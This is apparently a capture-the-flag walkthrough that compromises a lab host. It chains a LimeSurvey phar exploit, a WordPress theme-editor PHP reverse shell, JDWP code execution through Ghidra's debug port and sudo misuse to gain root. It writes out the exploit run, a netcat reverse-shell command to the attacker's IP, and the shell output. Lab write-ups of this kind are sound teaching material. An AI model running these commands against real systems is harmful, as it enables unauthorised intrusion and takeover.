Let’s start by running a port scan on the host using nmap.
The output of the scan can be seen below:
1
2
3
4
5
6
7
8
9
nmap -v -sS -sV 10.10.40.50
Nmap scan report for 10.10.40.50
Host is up (0.088s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
Port 21 (ftp)
There is not Anonymous authentication for this FTP service.
Port 80 (http)
LimeSurvey is an advanced online survey system to create online surveys.
Port 443 (https)
Here we can find a WordPress site with a note that the default /wp-login was hidden.
This exploit can be find on the Exploit-DB. The point of this exploitation is that the vulnerable versions are affected to a serialization attack via the “phar://” wrapper.
Providing found default credentials and running the exploit will give us a shell as a user www-data.
1
2
3
4
5
6
7
8
9
10
11
python 46634.py http://10.10.40.50 admin password[*] Logging in to LimeSurvey...
[*] Creating a new Survey...
[+] SurveyID: 231443[*] Uploading a malicious PHAR...
[*] Sending the Payload...
[*] TCPDF Response: <strong>TCPDF ERROR: </strong>[Image] Unable to get the size of the image: phar://./upload/surveys/231443/files/malicious.jpg
[+] Pwned! :)[+] Getting the shell...
$ id
uid=33(www-data)gid=33(www-data)groups=33(www-data)
Performing a basic manual enumeration, we will find a config.php for LimeSurvey.
In the Meta section, we can see Log In label which will redirects us to the hidden login portal ?devtools . There we can use found credentials to log in as Anny.
Gaining Access
From the previous experiences exploiting WordPress, we know that we can get a reverse shell through the page editor.
We will navigate to Appearance -> Editor. Then we will choose /archive.php and change its content to php reverse shell
After editing IP address and desired port, we will press the Update file button.
Before visiting updated php file, don’t forget to start a listener on your local machine.
Then we will navigate to http://10.10.40.50/wp-content/themes/{themename}/archive.php
and successfully gain access as a www-data user.
Lateral Movement
Performing a basic manual system enumeration, we will find that beside other services there is one running on port 18001. This is a JDWP debug port used by Ghidra when launching in the debug mode opened to all interfaces.
Ghidra is a Java-based reverse engineering framework that features a graphical user interface (GUI) and has been designed to run on a variety of platforms including Windows, macOS, and Linux. (more)
It is possible to perform RCE Through JDWP Debug Port. We will proceed according to the PoC video. The main point is to set a breakpoint on a class with run() method. Then when the breakpoint is hit, we will execute java reverse shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
www-data@ubuntu:/$ jdb -attach 127.0.0.1:18001
jdb -attach 127.0.0.1:18001
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
> classpath
classpath
base directory: /home/veronica
classpath: [/home/veronica/ghidra_9.0/support/../Ghidra/Framework/Utility/lib/Utility.jar]
> classes
. . .
> stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
>
Breakpoint hit: "thread=Log4j2-TF-4-Scheduled-1", org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run(), line=96bci=0
Log4j2-TF-4-Scheduled-1[1]print new java.lang.Runtime().exec(“nc -e 10.9.140.180 8888 /bin/sh”)
On the output below, we can see that we received a shell as a user veronica.
1
2
3
4
5
6
7
8
9
nc -lnvp 8888
listening on [any]8888 ...
connect to [10.9.140.180] from (UNKNOWN)[10.10.98.112]55378
id
uid=1000(veronica)gid=1000(veronica)groups=1000(veronica),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
python -c 'import pty;pty.spawn("/bin/bash")';
veronica@ubuntu:~$ wc user.txt
wc user.txt
1170 user.txt
Privilege Escalation
By issuing sudo -l, we can see which commands we can execute as root and some other important information.
1
2
3
4
5
6
7
8
9
veronica@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for veronica on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User veronica may run the following commands on ubuntu:
(ALL : ALL) ALL
(root : root) NOPASSWD: /usr/bin/python3.5 /home/veronica/base.py
Based on the output above, we can ran base.py as a user root.
We will delete this file and create a python script with the same name and one liner to spawn a bash shell as a user root.